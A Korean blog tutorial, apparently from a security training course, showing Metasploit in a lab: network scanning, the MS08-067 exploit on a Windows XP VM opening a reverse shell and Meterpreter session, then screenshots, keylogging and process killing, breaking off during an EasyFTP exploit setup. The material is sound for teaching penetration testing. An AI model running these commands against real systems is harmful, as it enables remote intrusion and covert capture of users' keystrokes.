정보보안(구버전)/Metasploit 2016. 6. 1. 11:31
Metasploit - 02. 메타스플로잇 명령어 및 사용 방법
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
[실습 시스템] Kali Linux, Firewall, CentOS, Window2008, WindowXP
- 간단한 예제를 통하여 명령어 및 사용 방법을 습득하도록 한다. 도움말 보고 하기에는 힘들다.
root@kali:~# msfconsole
[실습 단계]
스캔 -> 취약점 공격 -> ID/PASSWORD 획득 -> 악성 코드 유입 -> 제어권 획득
1. Scanning
Ex1) Idle Scan
- 비활성화된 타겟의 IPID 정보 스캔 (용도 : 스푸핑 IP 주소 및 좀비 PC 선정)
msf > search scanner
~ 중간 생략 ~
msf > search ipidseq
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ip/ipidseq normal IPID Sequence Scanner
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) >
msf auxiliary(ipidseq) > show options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface <- 인터페이스 지정
RHOSTS yes The target address range or CIDR identifier <- 타켓 IP 주소 지정
RPORT 80 yes The target port <- 타겟 포트 지정
SNAPLEN 65535 yes The number of bytes to capture <- 캡처할 용량 지정
THREADS 1 yes The number of concurrent threads <- 쓰레드 지정(낮으면 느림)
TIMEOUT 500 yes The reply read timeout in milliseconds <- 응답 속도 지정(낮게 조정 권장)
- no : 설정 해도되고 않해도 됨
- yes : 무조건 설정해야 함
- THREADS : 공격 타겟이 많으면, 높게 조정 권장
msf auxiliary(ipidseq) > check
[-] Check failed: The following options failed to validate: RHOSTS.
msf auxiliary(ipidseq) > set INTERFACE eth1
INTERFACE => eth11
msf auxiliary(ipidseq) > set RHOSTS 192.168.20.0/24
RHOSTS => 192.168.20.0/24
msf auxiliary(ipidseq) > set RPORT 80
RPORT => 80
msf auxiliary(ipidseq) > set THREADS 16
THREADS => 16
msf auxiliary(ipidseq) > show options
Module options (auxiliary/scanner/ip/ipidseq):
Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE eth1 no The name of the interface
RHOSTS 192.168.20.0/24 yes The target address range or CIDR identifier
RPORT 80 yes The target port
SNAPLEN 65535 yes The number of bytes to capture
THREADS 16 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(ipidseq) > run
[*] Scanned 29 of 256 hosts (11% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[*] 192.168.20.100's IPID sequence class: All zeros
[*] Scanned 105 of 256 hosts (41% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] 192.168.20.201's IPID sequence class: Incremental! <-- 통신 않하고 있는 타겟(스푸핑 IP 주소로 선정 가능)
[*] 192.168.20.200's IPID sequence class: All zeros
[*] 192.168.20.203's IPID sequence class: Incremental! <-- 통신 않하고 있는 타겟(스푸핑 IP 주소로 선정 가능)
[*] Scanned 207 of 256 hosts (80% complete)
[*] Scanned 236 of 256 hosts (92% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
- '192.168.2.201' 주소를 이용하여 CentOS에 대한 스캐닝 실시
-Pn : Treat all hosts as online -- skip host discovery
-sI <zombie host[:probeport]>: Idle scan
msf auxiliary(ipidseq) > db_nmap -Pn -sI 192.168.20.201 192.168.20.200
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-01 13:44 KST
[*] Nmap: Idle scan using zombie 192.168.20.201 (192.168.20.201:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.20.200
[*] Nmap: Host is up (0.053s latency).
[*] Nmap: Not shown: 988 closed|filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 22/tcp open ssh
[*] Nmap: 23/tcp open telnet
[*] Nmap: 25/tcp open smtp
[*] Nmap: 53/tcp open domain
[*] Nmap: 80/tcp open http
[*] Nmap: 110/tcp open pop3
[*] Nmap: 111/tcp open rpcbind
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps
[*] Nmap: 995/tcp open pop3s
[*] Nmap: MAC Address: 00:0C:29:72:28:7C (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds
msf auxiliary(ipidseq) > back
msf >
Ex2) Syn Scan
- 공격 타겟에 대한 포트 상태 여부를 확인하는 스켄 (nmap 처럼 다양한 정보를 스캔할 수 없음)
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/wordpress_pingback_access normal Wordpress Pingback Locator
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) >
msf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE no The name of the interface
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 1 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > set INTERFACE eth1
INTERFACE => eth1
msf auxiliary(syn) > set PORTS 1-100
PORTS => 1-100
msf auxiliary(syn) > set RHOSTS 192.168.20.200
RHOSTS => 192.168.20.200
msf auxiliary(syn) > set THREADS 16
THREADS => 16
shmsf auxiliary(syn) > show options
Module options (auxiliary/scanner/portscan/syn):
Name Current Setting Required Description
---- --------------- -------- -----------
BATCHSIZE 256 yes The number of hosts to scan per set
INTERFACE eth1 no The name of the interface
PORTS 1-100 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.20.200 yes The target address range or CIDR identifier
SNAPLEN 65535 yes The number of bytes to capture
THREADS 16 yes The number of concurrent threads
TIMEOUT 500 yes The reply read timeout in milliseconds
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.20.200:21
[*] TCP OPEN 192.168.20.200:22
[*] TCP OPEN 192.168.20.200:23
[*] TCP OPEN 192.168.20.200:25
[*] TCP OPEN 192.168.20.200:53
[*] TCP OPEN 192.168.20.200:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) > back
msf >
Ex3) SMB Block Scan
- Window Net-Bios를 이용한 스캔
msf > search smb_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_version normal SMB Version Detection
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) >
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(smb_version) > set RHOSTS 192.168.20.0/24
RHOSTS => 192.168.20.0/24
msf auxiliary(smb_version) > set THREADS 16
THREADS => 16
msf auxiliary(smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.20.0/24 yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 16 yes The number of concurrent threads
msf auxiliary(smb_version) > run
[*] Scanned 29 of 256 hosts (11% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] 192.168.20.201:445 is running Windows 2008 R2 Enterprise SP1 (build:7601) (name:WIN2008) (domain:WORKGROUP)
[*] 192.168.20.203:445 is running Windows XP SP3 (language:Korean) (name:WITH-15B28B4CFD) (domain:WORKGROUP)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_version) > back
msf >
Ex4) FTP Scan
- FTP를 이용한 스캔
msf > search ftp_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ftp/ftp_version normal FTP Version Scanner
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) >
smsf auxiliary(ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 21 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(ftp_version) > set RHOSTS 192.168.20.200
RHOSTS => 192.168.20.200
msf auxiliary(ftp_version) > set THREADS 50
THREADS => 50
msf auxiliary(ftp_version) > show options
Module options (auxiliary/scanner/ftp/ftp_version):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS 192.168.20.200 yes The target address range or CIDR identifier
RPORT 21 yes The target port
THREADS 50 yes The number of concurrent threads
msf auxiliary(ftp_version) > run
[*] 192.168.20.200:21 FTP Banner: '220 (vsFTPd 2.0.5)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) > back
msf >
2. Exploit Tools (취약점 발견 -> 공격 실시)
Ex1) db_nmap 스캔
-sS : TCP Half Open Scan
-p : Port Number
msf > db_nmap -sS -p 1-500 192.168.20.203
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-01 15:52 KST
[*] Nmap: Nmap scan report for 192.168.20.203
[*] Nmap: Host is up (0.0016s latency).
[*] Nmap: Not shown: 493 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 25/tcp open smtp
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:69:FF:FD (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 5.79 seconds
-sS : TCP Half Open Scan
-Pn : Treat all hosts as online -- skip host discovery
-A : Enable OS detection, version detection, script scanning, and traceroute
-p : Port Number
msf > db_nmap -sS -Pn -A -p 1-500 192.168.20.203
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-01 15:53 KST
[*] Nmap: Nmap scan report for 192.168.20.203
[*] Nmap: Host is up (0.00041s latency).
[*] Nmap: Not shown: 488 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp EasyFTP Server ftpd
[*] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: | drw-rw-rw- 1 user group 0 Jan 24 12:02 . [NSE: writeable]
[*] Nmap: |_drw-rw-rw- 1 user group 0 Jan 24 12:02 .. [NSE: writeable]
[*] Nmap: |_ftp-bounce: no banner
[*] Nmap: 25/tcp open smtp Microsoft ESMTP 6.0.2600.5512
[*] Nmap: | smtp-commands: with-15b28b4cfd Hello [192.168.20.50], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
[*] Nmap: |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY
[*] Nmap: 80/tcp open http Microsoft IIS httpd 5.1
[*] Nmap: |_http-methods: No Allow or Public header in OPTIONS response (status code 404)
[*] Nmap: |_http-server-header: Microsoft-IIS/5.1
[*] Nmap: |_http-title: Site Not Found
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
[*] Nmap: 148/tcp filtered cronus
[*] Nmap: 197/tcp filtered unknown
[*] Nmap: 291/tcp filtered unknown
[*] Nmap: 336/tcp filtered unknown
[*] Nmap: 396/tcp filtered unknown
[*] Nmap: 443/tcp open https?
[*] Nmap: | http-cisco-anyconnect:
[*] Nmap: |_ ERROR: Not a Cisco ASA or unsupported version
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:69:FF:FD (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp3
[*] Nmap: OS details: Microsoft Windows XP SP3
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: with-15b28b4cfd; OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp
[*] Nmap: Host script results:
[*] Nmap: | ms-sql-info:
[*] Nmap: | \\192.168.20.203\pipe\sql\query:
[*] Nmap: | Version:
[*] Nmap: | Product: Microsoft SQL Server 2000
[*] Nmap: | Post-SP patches applied: false
[*] Nmap: | number: 8.00.194.00
[*] Nmap: | name: Microsoft SQL Server 2000 RTM
[*] Nmap: | Service pack level: RTM
[*] Nmap: |_ Named pipe: \\192.168.20.203\pipe\sql\query
[*] Nmap: |_nbstat: NetBIOS name: WITH-15B28B4CFD, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:69:ff:fd (VMware)
[*] Nmap: | smb-os-discovery:
[*] Nmap: | OS: Windows XP (Windows 2000 LAN Manager)
[*] Nmap: | OS CPE: cpe:/o:microsoft:windows_xp::-
[*] Nmap: | Computer name: with-15b28b4cfd
[*] Nmap: | NetBIOS computer name: WITH-15B28B4CFD
[*] Nmap: | Workgroup: WORKGROUP
[*] Nmap: |_ System time: 2016-06-01T15:53:39+09:00
[*] Nmap: | smb-security-mode:
[*] Nmap: | account_used: guest
[*] Nmap: | authentication_level: user
[*] Nmap: | challenge_response: supported
[*] Nmap: |_ message_signing: disabled (dangerous, but default)
[*] Nmap: |_smbv2-enabled: Server doesn't support SMBv2 protocol
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT ADDRESS
[*] Nmap: 1 0.41 ms 192.168.20.203
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 20.53 seconds
-sS : TCP Half Open Scan
-Pn : Treat all hosts as online -- skip host discovery
-p : Port Number
--script= : Script Scan
msf > db_nmap -sS -Pn -p 1-500 --script=smb-check-vulns 192.168.20.203 (업데이트 실시 X)
msf > db_nmap -sS -Pn -p 1-500 --script=smb-vuln-ms08-067.nse 192.168.20.203
[*] Nmap: Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-05 19:51 KST
[*] Nmap: Nmap scan report for 192.168.20.203
[*] Nmap: Host is up (0.00020s latency).
[*] Nmap: Not shown: 493 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 25/tcp open smtp
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:71:CB:DC (VMware)
[*] Nmap: Host script results:
[*] Nmap: | smb-vuln-ms08-067:
[*] Nmap: | VULNERABLE:
[*] Nmap: | Microsoft Windows system vulnerable to remote code execution (MS08-067)
[*] Nmap: | State: VULNERABLE
[*] Nmap: | IDs: CVE:CVE-2008-4250
[*] Nmap: | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
[*] Nmap: | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
[*] Nmap: | code via a crafted RPC request that triggers the overflow during path canonicalization.
[*] Nmap: |
[*] Nmap: | Disclosure date: 2008-10-23
[*] Nmap: | References:
[*] Nmap: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[*] Nmap: |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.83 seconds
msf >
Ex2) 'windows/shell/reverse_tcp' Payload 공격 모듈
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
~ 중간 생략 ~
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
~ 중간 생략 ~
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows 2003 SP0 Universal
~ 중간 생략 ~
44 Windows XP SP3 Hungarian (NX)
45 Windows XP SP3 Italian (NX)
46 Windows XP SP3 Japanese (NX)
47 Windows XP SP3 Korean (NX)
48 Windows XP SP3 Dutch (NX)
~ 중간 생략 ~
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set LHOST 192.168.20.50
LHOST => 192.168.20.50
msf exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080
msf exploit(ms08_067_netapi) > set RHOST 192.168.20.203
RHOST => 192.168.20.203
msf exploit(ms08_067_netapi) > set target 47
target => 47
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.20.203 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.20.50 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.20.50:8080
[*] Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.20.203
[*] Command shell session 1 opened (192.168.20.50:8080 -> 192.168.20.203:1051) at 2016-06-01 16:15:10 +0900
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ���� ���� ����:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.20.203
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.100
C:\WINDOWS\system32> (ctrl+c)
Abort session 1? [y/N] y
[*] 192.168.20.203 - Command shell session 1 closed. Reason: User exit
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > back
msf >
Ex3) 'windows/meterpreter/reverse_tcp' Payload 공격 모듈
msf > search ms08-067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.20.203 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.20.50 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > unset PAYLOAD
Unsetting PAYLOAD...
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
~ 중간 생략 ~
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection),
~ 중간 생략 ~
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.20.203 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.20.50 yes The listen address
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
47 Windows XP SP3 Korean (NX)
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.20.50:8080
[*] Attempting to trigger the vulnerability...
[*] Sending stage (957487 bytes) to 192.168.20.203
[*] Meterpreter session 3 opened (192.168.20.50:8080 -> 192.168.20.203:1053) at 2016-06-01 16:28:59 +0900
meterpreter > shell
Process 1284 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter ���� ���� ����:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.20.203
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.100
C:\WINDOWS\system32>
C:\WINDOWS\system32> (ctrl+c)
Terminate channel 1? [y/N] y
meterpreter >
- 타겟 시스템 정보 확인 및 프로세스 확인
meterpreter > sysinfo
Computer : WITH-15B28B4CFD
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : ko_KR
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
368 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
~ 중간 생략 ~
- 타겟 시스템 현재 화면 스크린샷 (Kali Linux 탐색기 -> 홈 디렉토리 -> 확인)
meterpreter > screenshot
Screenshot saved to: /root/DyxZRLRF.jpeg
- 타겟 시스템 키-로그 (WindowXP에서 메모장 실행)
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
~ 중간 생략 ~
476 1216 notepad.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\system32\notepad.exe
~ 중간 생략 ~
meterpreter > migrate 476
[*] Migrating from 800 to 476...
[*] Migration completed successfully.
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against WITH-15B28B4CFD
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf5/loot/20160601165507_default_192.168.20.203_host.windows.key_817389.txt
[*] Recording keystrokes..
@ WindowXP
- WindowXP에서 메모장에 아무거나 입력 실시
@ Kali Linux
[*] Keystrokes being saved in to /root/.msf5/loot/20160601165507_default_192.168.20.203_host.windows.key_817389.txt
[*] Recording keystrokes...
(ctrl+c)
[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter >
(터미널2)
root@kali:~# ls -la /root/.msf5/loot
합계 12
drwxr-xr-x 2 root root 4096 6월 1 16:55 .
drwxr-xr-x 8 root root 4096 6월 1 11:30 ..
-rw-r--r-- 1 root root 66 6월 1 16:56 20160601165507_default_192.168.20.203_host.windows.key_817389.txt
root@kali:~# cat /root/.msf5/loot/20160601165507_default_192.168.20.203_host.windows.key_817389.txt
Keystroke log started at 2016-06-01 16:55:07 +0900
beg
<Return>
root@kali:~#
- 타겟 시스템 프로그램 강제 종료
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
~ 중간 생략 ~
476 1216 notepad.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\system32\notepad.exe
~ 중간 생략 ~
meterpreter > kill 476
Killing: 476
meterpreter >
meterpreter > quit
[*] Shutting down Meterpreter...
[*] 192.168.20.203 - Meterpreter session 4 closed. Reason: User exit
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > back
msf >
Ex4) FTP 취약점을 이용한 공격 (WindowXP FTP : eastFTP 1.7.0.11 실행)
msf > search easyftp
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/ftp/easyftp_cwd_fixret 2010-02-16 great EasyFTP Server CWD Command Stack Buffer Overflow
exploit/windows/ftp/easyftp_list_fixret 2010-07-05 great EasyFTP Server LIST Command Stack Buffer Overflow
exploit/windows/ftp/easyftp_mkd_fixret 2010-04-04 great EasyFTP Server MKD Command Stack Buffer Overflow
exploit/windows/http/easyftp_list 2010-02-18 great EasyFTP Server list.html path Stack Buffer Overflow
umsf > use exploit/windows/ftp/easyftp_cwd_fixret
msf exploit(easyftp_cwd_fixret) >
smsf exploit(easyftp_cwd_fixret) > show options
Module options (exploit/windows/ftp/easyftp_cwd_fixret):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOST yes The target address
RPORT 21 yes The target port
Exploit target:
Id Name
-- ----
0 Windows Universal - v1.7.0.2
msf exploit(easyftp_cwd_fixret) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
~ 중간 생략 ~
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection),
~ 중간 생략 ~
msf exploit(easyftp_cwd_fixret) > show targets
Exploit targets:
Id Name
-- ----
